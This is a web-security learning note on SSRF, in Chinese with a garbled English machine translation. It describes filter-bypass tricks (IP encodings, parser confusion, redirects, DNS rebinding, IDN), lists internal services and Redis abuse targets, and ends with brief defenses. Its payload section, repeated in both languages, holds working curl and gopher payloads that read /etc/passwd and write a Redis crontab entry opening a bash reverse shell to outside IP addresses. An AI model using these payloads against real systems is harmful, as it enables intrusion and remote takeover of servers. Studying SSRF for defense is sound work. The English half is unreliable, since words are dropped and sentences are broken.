Web安全学习笔记 SSRF漏洞浅析(Analysis of SSRF vulnerability in Web Security Learning Notes)

Web安全学习笔记 SSRF漏洞浅析

顺舟难度同心人 同梦相思心上人

顺舟难度同心人 同梦相思心上人

1. 简介

SSRF 服务端请求伪造

Server Side Request Forgery

指的是攻击者在未能取得服务器时,。SSRF攻击通常针对外部网络无法直接访问的系统。

所有权限
利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网
内部

1.1. 漏洞危害

SSRF可以对外网、服务器所在内网、本地,攻击运行在内网或本地的应用,或者利用协议读取本地文件。

进行端口扫描
File

内网服务防御相对外网服务来说一般会较弱,甚至部分内网服务为了运维方便并没有对内网的访问设置权限验证,所以存在SSRF时,通常会造成较大的危害。

2. 利用方式

SSRF利用存在多种形式以及不同的场景,针对不同场景可以使用不同的利用和绕过方式。

以为例, 可以使用操作、读文件、反弹Shell等功能,常见的如下:

curl
dict协议
Redis
file协议
gopher协议
Payload
curl -vvv 'dict://127.0.0.1:6379/info'curl -vvv 'file:///etc/passwd'# * 注意: 链接使用单引号,避免$变量问题curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

3. 相关危险函数

SSRF涉及到的危险函数主要是网络访问,支持伪协议的网络读取。以PHP为例,涉及到的函数有//等。

file_get_contents()
fsockopen()
curl_exec()

4. 过滤绕过

4.1. 更改IP地址写法

一些开发者会通过对传过来的URL参数进行正则匹配的方式来过滤掉内网IP,如采用如下正则表达式:

^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

对于这种过滤我们采用改编IP的写法的方式进行绕过,例如这个IP地址可以被改写成:

192.168.0.1
8进制格式:0300.0250.0.116进制格式:0xC0.0xA8.0.110进制整数格式:323223552116进制整数格式:0xC0A80001合并后两位:1.1.278 / 1.1.755合并后三位:1.278 / 1.755 / 3.14159267另外IP中的每一位,各个进制可以混用。

访问改写后的IP地址时,Apache会报,但等其他服务仍能正常工作。

400 Bad Request
Nginx、MySQL

另外,这个IP可以直接访问到本地,也通常被正则过滤遗漏。

0.0.0.0

4.2. 使用解析到内网的域名

如果服务端没有先解析IP再过滤内网地址,我们就可以使用等解析到内网的域名。

localhost

另外提供了一个方便的服务,这个网站的子域名会解析到对应的IP,例如,解析到192.168.0.1。

xip.io
192.168.0.1.xip.io

4.3. 利用解析URL所出现的问题

在某些情况下,后端程序可能会对访问的进行解析,对解析出来的进行过滤。这时候可能会出现对URL参数解析不当,导致可以绕过过滤。

URL
host地址

比如 当后端程序通过不正确的正则表达式(比如将http之后到com为止的字符内容,也就是,认为是访问请求的host地址时)对上述URL的内容进行解析的时候,很有可能会认为访问URL的host为,而实际上这个URL所请求的内容都是上的内容。

http://www.baidu.com@192.168.0.1/
www.baidu.com
www.baidu.com
192.168.0.1

4.4. 利用跳转

如果后端服务器在接收到参数后,正确的解析了URL的host,并且进行了过滤,我们这个时候可以使用跳转的方式来进行绕过。

等服务跳转,但是由于URL中包含了这种内网IP地址,可能会被正则表达式过滤掉,可以通过短地址的方式来绕过。

http://httpbin.org/redirect-to?url=http://192.168.0.1
192.168.0.1

常用的跳转有和,区别在于307跳转会转发中的数据等,但是302跳转不会。

302跳转
307跳转
POST请求

4.5. 通过各种非HTTP协议

如果服务器端程序对访问URL所采用的协议进行验证的话,可以通过非HTTP协议来进行利用。

比如通过,可以在一个中构造POST或者GET请求,从而达到攻击内网应用的目的。例如可以使用对与内网的进行攻击,可以使用如下的URL:

gopher
url参数
gopher协议
Redis服务
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

除了gopher协议,File协议也是SSRF中常用的协议,该协议主要用于访问本地计算机中的文件,我们可以通过类似 这种格式来访问计算机本地文件。使用可以避免服务端程序对于所访问的IP进行的过滤。例如我们可以通过 来访问D盘中的内容。

file:///path/to/file
file协议
file:///d:/1.txt
1.txt

4.6. DNS Rebinding

一个常用的防护思路是:对于用户请求的URL参数,首先服务器端会对其进行DNS解析,然后对于DNS服务器返回的IP地址进行判断,如果在黑名单中,就禁止该次请求。

但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间差,利用这个时间差,可以进行DNS重绑定攻击。

要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0。这样就可以进行攻击了,完整的攻击流程为:

1.服务器端获得URL参数进行第一次DNS解析获得了一个非内网的IP2.对于获得的IP进行判断发现为非黑名单IP则通过验证3.服务器端对于URL进行访问由于DNS服务器设置的TTL为0所以再次进行DNS解析这一次DNS服务器返回的是内网地址4.由于已经绕过验证所以服务器端返回访问内网资源的结果

4.7. 利用IPv6

有些服务没有考虑IPv6的情况,但是内网又支持IPv6,则可以使用IPv6的本地IP如 或IPv6的内网域名来绕过过滤。

[::]
0000::1

4.8. 利用IDN

一些网络访问工具如Curl等是支持国际化域名(Internationalized Domain Name,IDN)的,国际化域名又称特殊字符域名,是指部分或完全使用特殊的文字或字母组成的互联网域名。

在这些字符中,部分字符会在访问时做一个等价转换,例如 和等同。利用这种方式,可以用等字符绕过内网限制。

. 
example.com
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩

5. 可能的利用点

5.1. 内网服务

Apache Hadoop远程命令执行axis2-admin部署Server命令执行Confluence SSRFcounchdb WEB API远程命令执行dictdocker API远程命令执行Elasticsearch引擎Groovy脚本命令执行ftp / ftps(FTP爆破)glassfish任意文件读取和war文件部署间接命令执行gopherHFS远程命令执行http、httpsimap/imaps/pop3/pop3s/smtp/smtps(爆破邮件用户名密码)Java调试接口命令执行JBOSS远程Invoker war命令执行Jenkins Scripts接口命令执行ldapmongodbphp_fpm/fastcgi 命令执行rtsp - smb/smbs(连接SMB)sftpShellShock 命令执行Struts2 命令执行telnettftp(UDP协议扩展)tomcat命令执行WebDav PUT上传任意文件WebSphere Admin可部署war间接命令执行zentoPMS远程命令执行

5.2. Redis利用

写ssh公钥写crontab写WebShellWindows写启动项主从复制加载 .so 文件主从复制写无损文件

5.3. 云主机

在等云环境下,通过访问云环境的元数据API或管理API,在部分情况下可以实现敏感信息等效果。

AWS、Google

6. 防御方式

1.过滤返回的信息2.统一错误信息3.限制请求的端口4.禁止不常用的协议5.对DNS Rebinding考虑使用DNS缓存或者Host白名单

7. 参考链接

SSRF漏洞分析与利用

https://blog.csdn.net/smli_ng/article/details/106679572

A New Era Of SSRF

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

谈一谈如何在Python开发中拒绝SSRF漏洞

https://www.leavesongs.com/PYTHON/defend-ssrf-vulnerable-in-python.html

SSRF Tips

http://blog.safebuff.com/2016/07/03/SSRF-Tips/

SSRF in PHP

https://joychou.org/web/phpssrf.html
————————

< strong > analysis of SSRF vulnerabilities in Web Security Learning Notes < / strong >

The one who follows the boat is in love with the one who dreams

The one who follows the boat is in love with the one who dreams

1. Introduction

SSRF server request forgery

Server Side Request Forgery

This refers to when an attacker fails to obtain the server,. SSRF attacks usually target systems that cannot be directly accessed by external networks.

所有权限
利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网
内部

1.1. Vulnerability hazard

SSRF can attack applications running on the intranet or local network, or use the protocol to read local files.

进行端口扫描
File

The defense of intranet services is generally weaker than that of Extranet services. Even some intranet services do not set permission verification for intranet access for the convenience of operation and maintenance. Therefore, when SSRF exists, it will usually cause great harm.

2. Utilization mode

There are many forms of SSRF utilization and different scenarios. Different utilization and bypass methods can be used for different scenarios.

For example, you can use functions such as operation, file reading, rebound shell, etc. the common ones are as follows:

curl
dict协议
Redis
file协议
gopher协议
Payload
curl -vvv 'dict://127.0.0.1:6379/info'curl -vvv 'file:///etc/passwd'# * 注意: 链接使用单引号,避免$变量问题curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

3. Relevant hazard function

The danger function involved in SSRF is mainly network access, which supports network reading of pseudo protocol. Taking PHP as an example, the functions involved include / / and so on.

file_get_contents()
fsockopen()
curl_exec()

4. Filter bypass

4.1. Change IP address writing

Some developers will filter out the intranet IP by regular matching the URL parameters passed, such as using the following regular expression:

^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

For this filtering, we use the way of adapting the writing method of IP to bypass it. For example, this IP address can be rewritten as:

192.168.0.1
8进制格式:0300.0250.0.116进制格式:0xC0.0xA8.0.110进制整数格式:323223552116进制整数格式:0xC0A80001合并后两位:1.1.278 / 1.1.755合并后三位:1.278 / 1.755 / 3.14159267另外IP中的每一位,各个进制可以混用。

When accessing the rewritten IP address, Apache will report, but other services can still work normally.

400 Bad Request
Nginx、MySQL

In addition, this IP can be directly accessed locally and is usually omitted by regular filtering.

0.0.0.0

4.2. Use the domain name resolved to the Intranet

If the server does not first resolve the IP and then filter the intranet address, we can use the domain name resolved to the intranet.

localhost

In addition, it provides a convenient service. The sub domain name of the website will be resolved to the corresponding IP, for example, 192.168.0.1.

xip.io
192.168.0.1.xip.io

4.3. Problems with URL resolution

In some cases, the back-end program may parse the accessed and filter the parsed. At this time, improper parsing of URL parameters may occur, resulting in bypassing filtering.

URL
host地址

For example, when the back-end program parses the content of the above URL through an incorrect regular expression (such as the character content from HTTP to com, that is, when it is considered to be the host address of the access request), it is likely to think that the host of the access URL is, but in fact, the content requested by this URL is the content of.

http://www.baidu.com@192.168.0.1/
www.baidu.com
www.baidu.com
192.168.0.1

4.4. Use jump

If the back-end server correctly parses the host of the URL and filters it after receiving the parameters, we can bypass it by jumping at this time.

But because the URL contains this intranet IP address, it may be filtered out by regular expression and can be bypassed by short address.

http://httpbin.org/redirect-to?url=http://192.168.0.1
192.168.0.1

Commonly used jumps are and. The difference is that 307 jumps the data in transfer forwarding, but 302 does not.

302跳转
307跳转
POST请求

4.5. Through various non HTTP protocols

If the server-side program verifies the protocol used to access the URL, it can be used through non HTTP protocol.

For example, a post or get request can be constructed in a to attack intranet applications. For example, you can use the following URL to attack the with the intranet:

gopher
url参数
gopher协议
Redis服务
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

In addition to gopher protocol, File protocol is also a commonly used protocol in SSRF. This protocol is mainly used to access the files in the local computer. We can access the local files of the computer through a format similar to this format. Using can avoid the filtering of the accessed IP by the server program. For example, we can access the contents of disk D through.

file:///path/to/file
file协议
file:///d:/1.txt
1.txt

4.6. DNS Rebinding

A common protection idea is: for the URL parameters requested by the user, the server will first DNS resolve them, and then judge the IP address returned by the DNS server. If they are in the blacklist, the request will be prohibited.

However, in the whole process, there is a time difference between the first time to request the DNS service for domain name resolution and the second time the server requests the URL. Using this time difference, DNS rebinding attack can be carried out.

To complete the DNS rebinding attack, we need a domain name, assign the resolution of this domain name to our own DNS server, write the resolution service on our controllable DNS server, and set the TTL time to 0. In this way, you can attack. The complete attack process is as follows:

1.服务器端获得URL参数进行第一次DNS解析获得了一个非内网的IP2.对于获得的IP进行判断发现为非黑名单IP则通过验证3.服务器端对于URL进行访问由于DNS服务器设置的TTL为0所以再次进行DNS解析这一次DNS服务器返回的是内网地址4.由于已经绕过验证所以服务器端返回访问内网资源的结果

4.7. Using IPv6

If some services do not consider IPv6, but the intranet supports IPv6, you can use the local IP of IPv6 or the intranet domain name of IPv6 to bypass the filtering.

[::]
0000::1

4.8. Using IDN

Some network access tools, such as curl, support internationalized domain name (IDN). International domain name, also known as special character domain name, refers to the Internet domain name composed of some or all special words or letters.

Among these characters, some characters will be equivalent converted during access, such as and. In this way, you can bypass the intranet restrictions with equal characters.

. 
example.com
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩

5. Possible utilization points

5.1. Intranet service

Apache Hadoop远程命令执行axis2-admin部署Server命令执行Confluence SSRFcounchdb WEB API远程命令执行dictdocker API远程命令执行Elasticsearch引擎Groovy脚本命令执行ftp / ftps(FTP爆破)glassfish任意文件读取和war文件部署间接命令执行gopherHFS远程命令执行http、httpsimap/imaps/pop3/pop3s/smtp/smtps(爆破邮件用户名密码)Java调试接口命令执行JBOSS远程Invoker war命令执行Jenkins Scripts接口命令执行ldapmongodbphp_fpm/fastcgi 命令执行rtsp - smb/smbs(连接SMB)sftpShellShock 命令执行Struts2 命令执行telnettftp(UDP协议扩展)tomcat命令执行WebDav PUT上传任意文件WebSphere Admin可部署war间接命令执行zentoPMS远程命令执行

5.2. Redis利用

写ssh公钥写crontab写WebShellWindows写启动项主从复制加载 .so 文件主从复制写无损文件

5.3. Virtual machine

In the cloud environment, sensitive information and other effects can be achieved in some cases by accessing the metadata API or Management API of the cloud environment.

AWS、Google

6. Defense mode

1.过滤返回的信息2.统一错误信息3.限制请求的端口4.禁止不常用的协议5.对DNS Rebinding考虑使用DNS缓存或者Host白名单

7. Reference links

SSRF vulnerability analysis and utilization

https://blog.csdn.net/smli_ng/article/details/106679572

A New Era Of SSRF

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

Talk about how to reject SSRF vulnerabilities in Python development

https://www.leavesongs.com/PYTHON/defend-ssrf-vulnerable-in-python.html

SSRF Tips

http://blog.safebuff.com/2016/07/03/SSRF-Tips/

SSRF in PHP

https://joychou.org/web/phpssrf.html